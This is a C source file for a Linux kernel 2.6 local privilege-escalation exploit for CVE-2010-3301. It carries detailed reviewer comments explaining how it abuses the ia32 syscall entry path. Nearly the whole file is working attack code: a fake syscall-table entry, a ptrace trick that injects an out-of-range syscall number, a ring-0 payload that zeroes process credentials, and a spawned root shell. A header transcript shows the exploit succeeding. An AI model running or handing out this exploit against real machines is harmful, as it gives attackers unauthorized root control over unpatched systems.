/* Linux Kernel 2.6.x local root exploit (x86_64) ia32entry emulation
   ==================================================================
   Exploit for the rediscovered ia32 emulation vulnerability regression
   introduced into the Linux kernel 2.6 branch. This exploit gives a
   root shell, tested against Ubuntu 64bit - it sometimes has to be run
   more than once. Change the syscall_table value to match your kernel.
   Most of this is adapted from public code for the old 2007 exploit.
   CVE-2010-3301.

 Ex.
   fantastic@ubuntu:~$ uname -a
   Linux ubuntu 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40 UTC 2010 x86_64 GNU/Linux
   fantastic@ubuntu:~$ id
   uid=1000(fantastic) gid=1000(fantastic) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1
   (fantastic)
   fantastic@ubuntu:~$ ./x
   # id
   uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(fantastic)
   #

  -- prdelka
*/
  22. #include <sys/ptrace.h>
  23. #include <sys/user.h>
  24. #include <sys/types.h>
  25. #include <sys/wait.h>
  26. #include <unistd.h>
  27. #include <stdio.h>
  28. #include <sys/mman.h>
  29. #include <string.h>
  30. #include <stdlib.h>
  31. #include <stddef.h>
  32. #include <stdint.h>
  33.  
// ia32_sys_call_table address (/proc/kallsyms)
// Build-specific constant: it is only meaningful for the exact kernel image
// the author tested (the header names 2.6.32-24-generic).  On any other
// build it points somewhere else and the program simply does nothing useful.
#define syscall_table 0xffffffff810375d0
// The syscall number poked into the traced child below.  Its low 32 bits are
// zero, which is the whole point of CVE-2010-3301: the vulnerable ia32 entry
// path bounds-checked only %eax but indexed the table with the full 64-bit
// %rax, so this value passes the check and reaches 8*offset bytes past the
// table.  Patched kernels check the full register and reject it.
#define offset        (1L << 32)
// The table slot the vulnerable kernel dereferences for that number.  With
// the constants above the unsigned sum wraps around the 64-bit address space
// to 0x00000007810375d0 - an ordinary user-space address, which is why main()
// can mmap() it and plant a function pointer there.
#define landing       (syscall_table + 8*offset)

// The caller's real ids, read in main(); kernelmodecode() compares 32-bit
// words in memory against them (the shorts are promoted to unsigned int).
unsigned short uid, gid;
// Scratch written by kernelmodecode().  NOTE(review): presumably kept
// file-scope so the ring-0 callee needs no stack frame of its own; the source
// does not say.
unsigned long task_struct1;
unsigned long sp;
  42.  
/*
 * Payload the vulnerable kernel is tricked into calling in ring 0 (see
 * main()).  It runs on the current task's kernel stack, calls nothing, and
 * touches only the file-scope globals plus one local.  It has no return value
 * and no error path: if the pattern is never found the loop keeps walking
 * memory until it faults, which in ring 0 means a kernel oops rather than a
 * clean failure.
 */
void kernelmodecode() {
    // Capture the kernel stack pointer we were entered with.
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    // Round down to the 8 KiB boundary of that stack.  NOTE(review): on the
    // 2.6.32-era x86_64 kernels named in the header this is presumably the
    // thread_info base; the variable name is the original author's.
    task_struct1 = sp & ~(8192 - 1);
    unsigned int *task_struct;
    task_struct = (unsigned int *)task_struct1;
    // Linear scan upward, one 32-bit word at a time, for eight consecutive
    // words equal to uid,uid,uid,uid,gid,gid,gid,gid.  This layout is the one
    // assumed by the 2007 code the header says this was adapted from; it is a
    // heuristic, and a missed or false match is presumably why the header
    // says the program sometimes has to be run more than once (note that in
    // the header's own example uid == gid == 1000, so any eight equal words
    // would match).  The loop condition only tests the pointer for non-NULL,
    // so there is no upper bound on the walk.
    while (task_struct) {
        if (task_struct[0] == uid && task_struct[1] == uid &&
                task_struct[2] == uid && task_struct[3] == uid &&
                task_struct[4] == gid && task_struct[5] == gid &&
                task_struct[6] == gid && task_struct[7] == gid) {
            // Zero all eight words; the child's setuid(0)/setgid(0) afterwards
            // rely on this having hit the credential fields.
            task_struct[0] = task_struct[1] =
            task_struct[2] = task_struct[3] =
            task_struct[4] = task_struct[5] =
            task_struct[6] = task_struct[7] = 0;
            break;
        }
        task_struct++;
    }
    return;
}
  63.  
/*
 * Entry point.  Plants a user-space "syscall table entry" at `landing`, then
 * uses a ptrace()d child to enter the kernel via int 0x80 with the
 * out-of-range syscall number `offset`, so a kernel affected by
 * CVE-2010-3301 calls kernelmodecode() in ring 0.  The only mitigation is a
 * patched kernel (the fix shipped upstream in 2010): there the poked number
 * is rejected before indexing - presumably as -ENOSYS - and the child merely
 * runs setuid(0)/setgid(0) unprivileged (which fail, unchecked) and then
 * execs /bin/sh with the caller's own ids.  Nothing here checks the return
 * values of fork(), ptrace() or wait(), so every failure is silent.
 * Exits with status 255 (exit(-1)) only if the mmap() fails.
 */
int main() {
    uid = getuid();
    gid = getgid();
    // Map the 4 KiB page containing `landing` at that fixed user address.  It
    // must be writable because a pointer is stored into it below; PROT_EXEC
    // is requested too, although what the kernel executes is the function the
    // pointer names, not this page.
        if((signed long)mmap((void*)(landing&~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) < 0) {
                perror("mmap");
                exit(-1);
        }
    // The fake table slot: the vulnerable kernel indirect-calls through it.
        *(long*)landing = (uint64_t)kernelmodecode;
    pid_t child;
        child = fork();
        if(child == 0) {
                // Child: become traceable, park ourselves with SIGSTOP so the
                // parent can attach its syscall stop, then enter the kernel
                // through the 32-bit int 0x80 path.  kill()/SIGSTOP come from
                // <signal.h>, which this file does not include directly.
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                __asm__("int $0x80\n");
                // If kernelmodecode() zeroed our ids these now succeed; their
                // results are not checked either way.
        setuid(0);
        setgid(0);
                execl("/bin/sh", "/bin/sh", NULL);
        } else {
                // Parent: first wait() collects the child's SIGSTOP; then run it
                // until the next syscall entry (the int 0x80) and overwrite
                // orig_rax with `offset` (1<<32) while it is stopped there.
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                // Detach so the kernel continues the syscall with the modified
                // number, then wait for the shell (or the failed child) to exit.
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
        }
}